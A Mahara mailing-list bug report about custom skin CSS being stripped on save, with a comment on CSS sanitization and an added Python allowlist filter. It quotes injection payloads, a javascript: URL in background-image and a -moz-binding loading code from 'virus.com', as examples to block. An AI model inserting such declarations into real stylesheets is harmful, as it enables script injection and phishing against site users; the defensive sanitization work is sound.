mahara-contributors team mailing list archive

[Bug 1264098] Re: skins not saving properly

Some CSS properties and their values need to be sanitized to prevent injections or phishing.
For example,

background-image: url(javascript:alert('Injected'));
-moz-binding: url('http://virus.com/htmlBindings.xml');
position: absolute;

See more at
https://code.google.com/p/browsersec/wiki/Part1#Cascading_stylesheets

-- 
https://bugs.launchpad.net/bugs/1264098

Title:
  skins not saving properly

Status in Mahara ePortfolio:
  Confirmed

Bug description:
  I tried to create a new skin with custom CSS code added to the
  "Advanced" tab.

  collection-nav ul {
    columns: 2;
    -webkit-columns: 2;
    -moz-columns: 2;
  }

  When I save it, and then try to edit the skin, everything is deleted
  except:

  ul {
  }
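
The following is an added example, not part of the original message and not Mahara's code: a per-declaration allowlist filter that keeps the `columns` rule from the bug description while dropping the three risky declarations quoted in the comment. The function names and the short allowlist are assumptions made for illustration.

```python
import re

# Assumption: a short allowlist for illustration; a real skin editor needs a longer one.
ALLOWED = {"color", "background-color", "background-image", "columns",
           "margin", "padding", "font-size"}
VENDOR_PREFIX = re.compile(r"^-(webkit|moz|ms|o)-")
URL_RE = re.compile(r"url\(\s*(['\"]?)(.*?)\1\s*\)", re.I)
# CSS escapes, comments and markup can hide a scheme or break out of a <style> block.
BAD_VALUE = re.compile(r"expression\s*\(|[\\<>]|/\*", re.I)

def url_is_safe(target):
    target = re.sub(r"[\x00-\x20]", "", target)  # browsers ignore whitespace inside a scheme
    scheme = re.match(r"([a-z][a-z0-9+.\-]*):", target, re.I)
    return scheme is None or scheme.group(1).lower() in ("http", "https")

def sanitize_declaration(prop, value):
    """Return (prop, value) when the declaration is acceptable, else None."""
    prop, value = prop.strip().lower(), value.strip()
    if VENDOR_PREFIX.sub("", prop) not in ALLOWED:
        return None  # unknown property (-moz-binding, position, ...): drop
    if BAD_VALUE.search(value) or value.count("(") != value.count(")"):
        return None
    if any(not url_is_safe(m.group(2)) for m in URL_RE.finditer(value)):
        return None
    return prop, value

def sanitize_css(css):
    """Filter declarations one by one so a bad line does not empty the whole rule."""
    rules = []
    for selector, body in re.findall(r"([^{}]+)\{([^{}]*)\}", css):
        if re.search(r"[<@\\]", selector):
            continue  # at-rules and markup in selectors are out of scope: drop the rule
        kept = []
        for decl in body.split(";"):
            if ":" in decl:
                clean = sanitize_declaration(*decl.split(":", 1))
                if clean:
                    kept.append("  %s: %s;" % clean)
        rules.append("%s {\n%s\n}" % (selector.strip(), "\n".join(kept)))
    return "\n".join(rules)

# Constructed input: the rule from the bug description plus the comment's three examples.
SAMPLE = ("collection-nav ul { columns: 2; -webkit-columns: 2; -moz-columns: 2; "
          "background-image: url(javascript:alert('Injected')); "
          "-moz-binding: url('http://virus.com/htmlBindings.xml'); position: absolute; }")

if __name__ == "__main__":
    print(sanitize_css(SAMPLE))
```

Properties and URL schemes are matched against allowlists rather than a list of known-bad strings, so anything unrecognised is dropped by default.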
